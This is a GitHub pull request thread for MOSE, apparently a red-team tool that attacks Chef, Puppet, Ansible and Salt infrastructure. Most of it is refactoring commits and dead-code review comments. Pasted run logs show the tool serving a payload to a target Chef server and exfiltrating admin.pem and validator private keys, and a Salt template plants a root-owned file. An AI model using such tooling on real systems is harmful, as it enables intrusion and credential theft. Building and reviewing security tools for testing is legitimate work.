Boom

CrimsonK1ng opened the pull request:
* Remove packr2 from Makefile
* Add Salt support
* Switch to cobra
* Switch to using zerolog
* Switch file structure to utilize templates under cmd name
* Break apart pkgs
    * Move file system effecting functions to system
    * Move network functions to netutils
    * Move userinput to userinput
    * Moseutils is only for specific mose related utilities (TODO remove
entirely)
    * Agent (Unchanged)
    * Chefutils (Unchanged minus imports)

* Add input validation. Switch pkger paths (?). Switch azure commands for building
* Pkger invocation in userinput prior to go build
* Implement all targets as go module such that pkger will parse correctly
* Swap packr out for pkgre in azure
* Swap -fu => -u. Remove excess logging root
* Fix tests to just regex for full line, protects agaisnt timestamps in
log
* Moved logger setup to moseutils
* Moseutil imports can now be used as a way to setup logger, print to
* stdout with color for MSG level msgs
* Added NoColor option to mose

CrimsonK1ng committed:
* Replace packr2 with pkger
* Remove packr2 from Makefile
* Add Salt support
* Switch to cobra
* Switch to using zerolog
* Switch file structure to utilize templates under cmd name
* Break apart pkgs
    * Move file system effecting functions to system
    * Move network functions to netutils
    * Move userinput to userinput
    * Moseutils is only for specific mose related utilities (TODO remove
entirely)
    * Agent (Unchanged)
    * Chefutils (Unchanged minus imports)

* Add input validation. Switch pkger paths (?). Switch azure commands for building
* Pkger invocation in userinput prior to go build
* Implement all targets as go module such that pkger will parse correctly
* Swap packr out for pkgre in azure
* Swap -fu => -u. Remove excess logging root
* Fix tests to just regex for full line, protects against timestamps in
log
* Moved logger setup to moseutils
* Moseutil imports can now be used as a way to setup logger, print to stdout with color for MSG level msgs
* Added NoColor option to mose
* Add copyright message to all files
* Add README usage
* Fix docker container build issue due to refactor

l50 commented on pkg/moseutils/ui.go:
```diff
@@ -82,3 +103,76 @@ func IndexedUserQuestion(question string, osTarget string, validIndices map[int]
+			}
+		}
+		return l
+		//return strings.ToUpper(fmt.Sprintf("| %-6s|", i))
```
Dead, please remove @CrimsonK1ng

l50 commented on pkg/moseutils/ui.go:
```diff
@@ -82,3 +103,76 @@ func IndexedUserQuestion(question string, osTarget string, validIndices map[int]
+	return fmt.Sprintf("\x1b[%dm%v\x1b[0m", c, s)
+}
+
+func SetupLogger(debug bool) {
```
Remove or fix timestamp as it is not correct and takes up space @CrimsonK1ng .

l50 commented on pkg/userinput/userinput.go:
```diff
@@ -0,0 +1,273 @@
+		moseutils.ColorMsgf("Payload being served at %s://%s:%d/%s-%s for %d seconds", proto, i.LocalIP, i.WebSrvPort, i.CMTarget, strings.ToLower(i.OSTarget), i.TimeToServe)
+	}
+
+	//srv := moseutils.StartServer(i.WebSrvPort, "payloads", i.ServeSSL, i.SSLCertPath, i.SSLKeyPath, time.Duration(i.TimeToServe)*time.Second, true)
```
Dead code, remove @CrimsonK1ng

l50 commented on pkg/userinput/userinput.go:
```diff
@@ -0,0 +1,273 @@
+		log.Fatal().Err(err).Msg("Error running the command to generate the target payload")
+	}
+
+	//moseutils.Cd(prevDir)
```
Dead code, remove @CrimsonK1ng

l50 commented on pkg/userinput/userinput.go:
```diff
@@ -0,0 +1,273 @@
+		system.CpFile(i.FileUpload, filepath.Join(i.PayloadDirectory, filepath.Base(i.FileUpload)))
+	}
+
+	//_, err := system.RunCommand("env", "GOOS="+strings.ToLower(i.OSTarget), "GOARCH=amd64", "go", "build", "-o", payload, filepath.Join(i.BaseDir, "cmd", i.CMTarget, "main.go"), filepath.Join(i.BaseDir, "cmd", i.CMTarget, "params.go"))
```
Dead code, remove @CrimsonK1ng

l50 commented on pkg/userinput/userinput.go:
```diff
@@ -0,0 +1,273 @@
+		log.Info().Msgf("Generating %s payload to run %s on a %s system, please wait...", i.CMTarget, filepath.Base(i.FileUpload), strings.ToLower(i.OSTarget))
+	}
+
+	//prevDir := utils.Gwd()
```
Dead code, remove @CrimsonK1ng

l50 commented on pkg/userinput/userinput.go:
```diff
@@ -0,0 +1,273 @@
+	var origFileUpload string
+
+	paramLoc := filepath.Join(i.BaseDir, "cmd/", i.CMTarget, "main/tmpl")
+	//paramLoc := filepath.Join(CMTarget, "tmpl")
```
Dead code, remove @CrimsonK1ng

l50 commented on pkg/userinput/userinput.go:
```diff
@@ -0,0 +1,273 @@
+func (i *UserInput) GenerateParams() {
+	var origFileUpload string
+
+	paramLoc := filepath.Join(i.BaseDir, "cmd/", i.CMTarget, "main/tmpl")
```
Remove the `/` @CrimsonK1ng

l50 commented on pkg/moseutils/ui.go:
```diff
@@ -82,3 +103,76 @@ func IndexedUserQuestion(question string, osTarget string, validIndices map[int]
+	log.Log().Msg(fmt.Sprintf("\x1b[%dm%v\x1b[0m", ColorGreen, s))
+}
+
+// colorize returns the string s wrapped in ANSI code c, unless disabled is true.
```
Fix comment @CrimsonK1ng

l50 commented on pkg/moseutils/ui.go:
```diff
@@ -43,13 +63,14 @@ func AskUserQuestion(question string, osTarget string) (bool, error) {
 	for {
 		var err error
-		fmt.Println(question)
+		//log.Log().Msg(question)
```
Dead code, remove @CrimsonK1ng

l50 commented on cmd/root.go:
Dead code, remove @CrimsonK1ng

l50 commented on cmd/root.go:
Dead code, remove @CrimsonK1ng

l50 commented on cmd/puppet/main/tmpl/params.tmpl:
```diff
@@ -1,4 +1,4 @@
-package main
+package  main
```
Extra space, remove @CrimsonK1ng

l50 commented on cmd/puppet/main/main.go:
```diff
@@ -347,14 +352,23 @@ func doCleanup(manifestLocs []string) {
 func main() {
+	moseutils.NOCOLOR = noColor
+	moseutils.SetupLogger(debug)
+	//zerolog.SetGlobalLevel(zerolog.InfoLevel)
```
Dead code, remove @CrimsonK1ng

l50 commented on cmd/puppet.go:
```diff
@@ -0,0 +1,39 @@
+func init() {
+	rootCmd.AddCommand(puppetCmd)
+
+	// Here you will define your flags and configuration settings.
```
Remove boilerplate comments @CrimsonK1ng

l50 commented on cmd/chef.go:
```diff
@@ -0,0 +1,64 @@
+func init() {
+	rootCmd.AddCommand(chefCmd)
+
+	// Here you will define your flags and configuration settings.
```
Boilerplate, remove @CrimsonK1ng

l50 commented on cmd/ansible.go:
```diff
@@ -0,0 +1,39 @@
+func init() {
+	rootCmd.AddCommand(ansibleCmd)
+
+	// Here you will define your flags and configuration settings.
```
Boilerplate comments @CrimsonK1ng

l50 commented on .gitignore:
```diff
@@ -18,6 +18,9 @@ chef-linux
 puppet-linux
 ansible-linux
 
+# pkged.go
```
Dead, remove @CrimsonK1ng

l50 reviewed (commented):
@CrimsonK1ng  - Comments below need to be addressed. Also, the container code is no longer working:
```
./mose chef -c "touch /tmp/helloserver.txt && echo Hello, I am a file created by MOSE for Chef Server. >> /tmp/helloserver.txt" -l 10.42.42.15 --tts 20
7:08PM INF : Generating chef payload to run touch /tmp/helloserver.txt && echo Hello, I am a file created by MOSE for Chef Server. >> /tmp/helloserver.txt on a linux system, please wait...
7:08PM MSG : Payload being served at http://10.42.42.15:8090/chef-linux for 20 seconds
7:08PM INF : Web server shutting down...
7:08PM MSG : Is your target a chef workstation? [Y/n/q]
n
7:08PM MSG : Is your target a chef server? [Y/n/q]
Y
7:08PM MSG : Listener being served at http://10.42.42.15:443/chef-linux for 20 seconds
7:08PM INF : Successfully uploaded my_org
7:08PM INF : Successfully exfilled admin.pem
7:08PM INF : Successfully exfilled my_org-validator.pem
7:08PM INF : Web server shutting down...
7:08PM INF : Target organization name: my_org
7:08PM INF : Running knife ssl fetch, please wait...
7:09PM MSG : No nodes found, exiting...
```

Old code:
```
Generating chef payload to run touch /tmp/helloserver.txt && echo Hello, I am a file created by MOSE for Chef Server. >> /tmp/helloserver.txt on a linux system, please wait...
Payload being served at http://10.42.42.15:8090/chef-linux for 20 seconds
Web server shutting down...
Is your target a chef workstation? [Y/n/q]
n
Is your target a chef server? [Y/n/q]
Y
Listener being served at http://10.42.42.15:443/chef-linux for 20 seconds
Successfully uploaded my_org
Successfully exfilled admin.pem
Successfully exfilled my_org-validator.pem
Web server shutting down...
Target organization name: my_org
Running knife ssl fetch, please wait...
The following nodes were identified: chef-agent-1 chef-agent-2 chef-agent-3
```

l50 committed:
QA

- Remove extra space from .gitignore
- Add payloads directory creation back in
- Add installation of pkger to Makefile
- Simplify Makefile
- Remove cobra-generated comments
- Linting
- Remove commented-out code
- Add comments for exported variables
- Add back previously removed comments
- Parameterize static FilePath in saltFileUploadState.tmpl
- Fix comment formatting
- Made timestamp provide more information with RFC3339 time format
- Remove leftover debug checks (deprecated in favor of the .Debug()
  provided by zerolog)
- Fixed broken docker container generation logic for attacking chef servers
- Light refactoring
- Cleaned up azure pipeline
- Add test_salt_file_upload.exp
- Add and run `make tidy`
- Update README
- Update `EXAMPLES.md` to reflect new syntax
- Closes #50
- Bump go version in pipeline to 1.15.2
- Fix regression: default ports no longer work
- Add testing for downloads to pipeline

l50 commented on cmd/salt/main/tmpl/saltFileUploadState.tmpl:
```diff
@@ -0,0 +1,10 @@
+    - user: root
+    - group: root
+
+"/root/.notasevil":
```
Static values FTL

l50 commented on cmd/salt/main/tmpl/saltFileUploadState.tmpl:
```diff
@@ -0,0 +1,10 @@
+"{{.Cmd}}":
+  file.managed:
+    - name: /root/.notasevil
```
Static values FTL

l50 commented:
> @CrimsonK1ng - Comments below need to be addressed. Also, the container code is no longer working:
> 
> ```
> ./mose chef -c "touch /tmp/helloserver.txt && echo Hello, I am a file created by MOSE for Chef Server. >> /tmp/helloserver.txt" -l 10.42.42.15 --tts 20
> 7:08PM INF : Generating chef payload to run touch /tmp/helloserver.txt && echo Hello, I am a file created by MOSE for Chef Server. >> /tmp/helloserver.txt on a linux system, please wait...
> 7:08PM MSG : Payload being served at http://10.42.42.15:8090/chef-linux for 20 seconds
> 7:08PM INF : Web server shutting down...
> 7:08PM MSG : Is your target a chef workstation? [Y/n/q]
> n
> 7:08PM MSG : Is your target a chef server? [Y/n/q]
> Y
> 7:08PM MSG : Listener being served at http://10.42.42.15:443/chef-linux for 20 seconds
> 7:08PM INF : Successfully uploaded my_org
> 7:08PM INF : Successfully exfilled admin.pem
> 7:08PM INF : Successfully exfilled my_org-validator.pem
> 7:08PM INF : Web server shutting down...
> 7:08PM INF : Target organization name: my_org
> 7:08PM INF : Running knife ssl fetch, please wait...
> 7:09PM MSG : No nodes found, exiting...
> ```
> 
> Old code:
> 
> ```
> Generating chef payload to run touch /tmp/helloserver.txt && echo Hello, I am a file created by MOSE for Chef Server. >> /tmp/helloserver.txt on a linux system, please wait...
> Payload being served at http://10.42.42.15:8090/chef-linux for 20 seconds
> Web server shutting down...
> Is your target a chef workstation? [Y/n/q]
> n
> Is your target a chef server? [Y/n/q]
> Y
> Listener being served at http://10.42.42.15:443/chef-linux for 20 seconds
> Successfully uploaded my_org
> Successfully exfilled admin.pem
> Successfully exfilled my_org-validator.pem
> Web server shutting down...
> Target organization name: my_org
> Running knife ssl fetch, please wait...
> The following nodes were identified: chef-agent-1 chef-agent-2 chef-agent-3
> ```

This is now fixed.

CrimsonK1ng committed:
Fix Download Test, Misc

- Ensure download tests run in parallel
- Remove 443 test (this does not seem to work on Azure Pipelines)
- Finish fixing default ports
- Add `make lint`
- Additional linting and minor fixes
- Add `make fmt`
